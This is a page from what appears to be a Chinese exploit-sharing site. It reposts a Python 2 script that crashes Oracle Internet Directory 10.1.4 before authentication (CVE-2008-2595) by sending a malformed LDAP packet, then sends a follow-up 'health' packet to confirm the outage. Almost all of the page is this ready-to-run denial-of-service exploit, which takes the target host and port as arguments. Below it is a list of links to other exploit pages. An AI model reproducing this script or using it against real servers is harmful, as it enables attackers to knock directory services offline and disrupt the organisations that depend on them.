Oracle Internet Directory 10.1.4 Remote Preauth DoS Exploit

所属分类：网络安全 / Exploit 阅读数： 166

收藏 0赞 0分享

#!/usr/bin/python """
Oracle Internet Directory 10.1.4 preauthentication Denial Of Service NOTES: Under 32 bits platforms it crashes immediately. Under 64 bits it may take even hours.
Sometimes you need 2 shoots to crash OID completely. The server "commonly" tolerates one
shoot, but even when you only send one packet it will crash. Tested: Win2000 x86, WinXP x86, Win2003 X86_64 Vulnerability found by Joxean Koret (joxeankoret [ at ] yahoo DOT es) Fixed: Oracle Critical Patch Update July 2008
CVEID: CVE-2008-2595
""" import sys
import time
import socket healthPacket = "0%\\x02\\x01\\x01c \\x04\\x00\\n\\x01\\x02\\n\\x01\\x00\\x02\\x01\\x00\\x02\\x01\\x00\\x01\\x01\\x00\\x87\\x0bobjectClass0\\x00"
packet = "\x30\x0e\x02\x01\x01\x60\x09\x30\x01\x03\x04\x02\x44\x4e\x80\x00" def checkHealth(hostname, port):
print " --> Wating 5 seconds"
time.sleep(5)

print " --> Connecting to target..."
socket.setdefaulttimeout(5)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((hostname, port)) try:
print " --> Sending 'health' packet ..."
s.sendall(healthPacket)
print " --> Trying to receive something..."
data = s.recv(1024)
except:
err = sys.exc_info()[1] if int(err[0]) == 104:
print "[ ] Exploits works!"
return if data != "":
print "[!] Server is up and running :("
else:
print "[?] Server doesn't answer nothing. It works?" def oidDos(hostname, port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
print "[ ] Connecting to ldap://%s:%d..." % (hostname, port)
s.connect((hostname, int(port))) print "[ ] Sending packet..."
s.sendall(packet)
s.close() print "[ ] Checking OID's health..."
checkHealth(hostname, port)
except:
print sys.exc_info()[1] def usage():
print "Oracle Internet Directory 10.1.4 Remote Preauthentication DOS"
print "Copyright (c) 2007 Joxean Koret"
print
print "Usage:"
print sys.argv[0],"-h<hostname> -p<port>"
print def main():
if len(sys.argv) != 3:
usage()
sys.exit(0)

hostname = None
port = None i = 0
for param in sys.argv:
i = 1

if i == 1:
continue

if param.startswith("-h"):
hostname = param[2:]
elif param.startswith("-p"):
port = int(param[2:])
else:
print "Unknown option '%s'" % param
usage()
sys.exit(1)

if not hostname or not port:
print "Bad command line."
usage()
sys.exit(1) oidDos(hostname, port) if __name__ == "__main__":
main()

更多精彩内容其他人还在看

Oracle Internet Directory 10.1.4 Remote Preauth DoS Exploit

Maian Events 2.0 Insecure Cookie Handling Vulnerability

Maian Gallery 2.0 Insecure Cookie Handling Vulnerability

Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability

Maian Cart 1.1 Insecure Cookie Handling Vulnerability

Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit

phsBlog 0.2 Bypass SQL Injection Filtering Exploit

Easy Photo Gallery 2.1 XSS/FD/Bypass/SQL Injection Exploit

Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC

minb 0.1.0 Remote Code Execution Exploit

Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit

网络赚钱

站长故事